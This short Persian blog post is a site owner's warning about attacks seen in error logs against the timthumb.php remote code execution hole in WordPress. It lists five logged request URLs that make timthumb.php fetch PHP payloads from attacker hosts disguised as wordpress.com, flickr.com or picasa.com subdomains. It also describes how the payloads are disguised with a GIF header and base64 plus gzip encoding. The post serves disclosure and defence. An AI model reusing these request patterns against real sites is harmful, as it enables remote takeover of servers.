مدتی هست که با بررسی لاگهای خطای برنامه سایت، به این نوع لینکها(ی یافت نشد) میرسم:
و نکته جالب اینها، وجود خارجی داشتن سایتی مانند http://wordpress.com.4creatus.com/است. ابتدای نام دومین را هم با wordpress.com یا flickr.com شروع کردهاند تا آنچنان مشکوک به نظر نرسد.
به نظر این مساله باگی است در فایل timthumb.php بلاگهای وردپرس که دارد مورد سوء استفاده واقع میشود. به عبارتی این فایل خاص، به علت داشتن باگ امنیتی، امکان اجرای کد از راه دور را فراهم کرده است. برای نمونه اگر به آدرس مذکور مراجعه کنید فایلهای php آن قابل دریافت و بررسی هستند. این فایلها در ابتدای کار دارای هدر Gif بوده و در ادامه دارای کد PHP هستند. کدهای آن هم ابتدا base64 encoded شدهاند و سپس gzip encoded.
در کل جهت اطلاع کلیه کسانی که از وردپرس استفاده میکنند برای بررسی وضعیت سایت یا بلاگ خودشان.
http://www.thissite.info/wp-themes_page/netweb/timthumb.php?src=http://wordpress.com.4creatus.com/info.php http://www.thissite.info/pivotx/includes/timthumb.php?src=http://picasa.com.ganesavaloczi.hu/jos.php http://www.thissite.info/pivotx/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.topsaitebi.ge%2Fcpx.php http://www.thissite.info/pivotx/includes/timthumb.php?src=http%3A%2F%2Fpicasa.com.fm-pulizie.it%2Fxgood.php http://www.thissite.info/pivotx/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.showtimeentertainment.ca%2Fstunxx.php
به نظر این مساله باگی است در فایل timthumb.php بلاگهای وردپرس که دارد مورد سوء استفاده واقع میشود. به عبارتی این فایل خاص، به علت داشتن باگ امنیتی، امکان اجرای کد از راه دور را فراهم کرده است. برای نمونه اگر به آدرس مذکور مراجعه کنید فایلهای php آن قابل دریافت و بررسی هستند. این فایلها در ابتدای کار دارای هدر Gif بوده و در ادامه دارای کد PHP هستند. کدهای آن هم ابتدا base64 encoded شدهاند و سپس gzip encoded.
در کل جهت اطلاع کلیه کسانی که از وردپرس استفاده میکنند برای بررسی وضعیت سایت یا بلاگ خودشان.
